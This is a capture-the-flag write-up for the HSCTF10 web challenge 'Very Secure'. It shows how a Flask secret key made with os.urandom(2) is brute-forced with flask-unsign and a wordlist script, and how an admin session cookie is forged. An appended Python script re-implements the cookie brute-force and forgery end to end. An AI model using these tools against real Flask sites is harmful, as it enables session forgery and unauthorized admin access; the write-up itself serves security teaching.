HSCTF10 - web/Very Secure

Write-up for HSCTF10 web challenge - Very Secure


Description: This website is obviously 100% secure

Solution

Source Code:

[screenshot: noncomplex]

The Flask secret key is not complex: it is generated with os.urandom(2), which can only produce 65,536 (256 * 256) distinct keys. That key space is small enough to brute-force exhaustively.

Reading the source also shows that the flag is returned when the session contains name = admin.

[screenshot: session-admin]

For the wordlist used in brute-forcing, I generated a file with the following Python script. It writes every 2-byte value that os.urandom(2) can return, one per line, in the same bytes-literal form (b'\xe4\x89') that flask-unsign takes for --secret.

with open("bytes_list.txt", "w") as file:
    lines = []
    for byte1 in range(256):
        for byte2 in range(256):
            # str(bytes([...])) gives the literal form b'\xe4\x89', the same
            # form flask-unsign accepts for --secret and in its wordlist
            lines.append(str(bytes([byte1, byte2])) + "\n")
    file.writelines(lines)

To solve, the secret key has to be recovered and a session with name set to admin forged with it. First get a sample session cookie from the website (any valid cookie will do, since only the signature depends on the key). Flask session cookies can be brute-forced with the tool flask-unsign:

flask-unsign --wordlist <wordlist> --unsign --cookie <cookie>

[screenshot: brute-force]

The following command signs a new Flask session as admin with the recovered secret (the key found for this instance was b'\xe4\x89'):

flask-unsign --cookie "{'name': 'admin'}" --secret "b'\xe4\x89'"

Replace the session cookie in the browser with the forged value and reload the page to get the flag.
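As an added example (not the write-up's own code), the whole chain done offline in Python without flask-unsign: a stand-library re-implementation of the Flask session cookie format (itsdangerous URLSafeTimedSerializer with salt cookie-session, the "hmac" key derivation and SHA-1, which are Flask's defaults), a verifier, a brute-forcer over the 65,536-value key space of os.urandom(2), and a forger for {'name': 'admin'}. The sample cookie at the bottom is constructed here and signed with the key the write-up recovered, b'\xe4\x89'; a real target cookie comes from the browser instead.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional

# Flask signs session cookies with itsdangerous' URLSafeTimedSerializer using
# salt "cookie-session", the "hmac" key derivation and SHA-1. The helpers below
# re-implement that format with the standard library so the attack runs offline.
SALT = b"cookie-session"


def b64enc(raw: bytes) -> bytes:
    """URL-safe base64 without padding, as itsdangerous writes it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def b64dec(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))


def derive_key(secret: bytes) -> bytes:
    """itsdangerous 'hmac' key derivation: HMAC-SHA1(secret, salt)."""
    return hmac.new(secret, SALT, hashlib.sha1).digest()


def signature(secret: bytes, value: bytes) -> bytes:
    """Signature over '<payload>.<timestamp>' with the derived key."""
    return b64enc(hmac.new(derive_key(secret), value, hashlib.sha1).digest())


def sign_session(secret: bytes, data: dict, timestamp: Optional[int] = None) -> str:
    """Build a Flask session cookie carrying `data`, signed with `secret`."""
    payload = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:
        body = b"." + b64enc(compressed)  # leading '.' marks a zlib-compressed payload
    else:
        body = b64enc(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8, "big")
    value = body + b"." + b64enc(ts_bytes)
    return (value + b"." + signature(secret, value)).decode()


def verify_session(secret: bytes, cookie: str) -> bool:
    """True if `cookie` was signed with `secret` (timestamp expiry is ignored here)."""
    value, _, sig = cookie.encode().rpartition(b".")
    return hmac.compare_digest(signature(secret, value), sig)


def decode_session(cookie: str) -> dict:
    """Read the payload; no key needed, the cookie is signed, not encrypted."""
    raw = cookie.encode()
    compressed = raw.startswith(b".")
    body = (raw[1:] if compressed else raw).split(b".")[0]
    payload = b64dec(body)
    return json.loads(zlib.decompress(payload) if compressed else payload)


def brute_force_secret(cookie: str) -> Optional[bytes]:
    """Try every value os.urandom(2) can return (256 * 256 = 65,536 keys)."""
    value, _, sig = cookie.encode().rpartition(b".")
    for hi in range(256):
        for lo in range(256):
            candidate = bytes([hi, lo])
            if hmac.compare_digest(signature(candidate, value), sig):
                return candidate
    return None  # no 2-byte key matches: the secret is longer than os.urandom(2)


def forge_admin_cookie(sample_cookie: str) -> str:
    """Recover the key from any valid cookie, then sign {'name': 'admin'} with it."""
    secret = brute_force_secret(sample_cookie)
    if secret is None:
        raise ValueError("no 2-byte key signs this cookie")
    return sign_session(secret, {"name": "admin"})


if __name__ == "__main__":
    # Constructed sample: a guest cookie signed with the key the write-up
    # recovered (b'\xe4\x89'). Against the real target, paste the browser cookie.
    sample = sign_session(b"\xe4\x89", {"name": "guest"})
    print("recovered secret:", brute_force_secret(sample))
    print("forged cookie:", forge_admin_cookie(sample))
```

Two practical notes. The forged cookie carries the current time on purpose: Flask rejects session cookies older than PERMANENT_SESSION_LIFETIME (31 days by default), so re-signing with a stale timestamp can fail even with the right key. And brute_force_secret returning None is itself a useful check: it means the instance's key is not a 2-byte value and a wordlist built for os.urandom(2) will never hit.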

Flag

flag: flag{h0w_d1d_y0u_cr4ck_th3_k3y??}

Attack Chain

  1. Read the source and learn that the Flask secret key is only os.urandom(2), i.e. 65,536 possible keys
  2. Get a sample session cookie from the website
  3. Generate the 2-byte wordlist with the Python script above
  4. Brute-force the secret: flask-unsign --wordlist bytes_list.txt --unsign --cookie $cookie
  5. Generate an admin cookie: flask-unsign --cookie "{'name': 'admin'}" --secret $secret
  6. Replace the session cookie in the browser with the forged one and reload to get the flag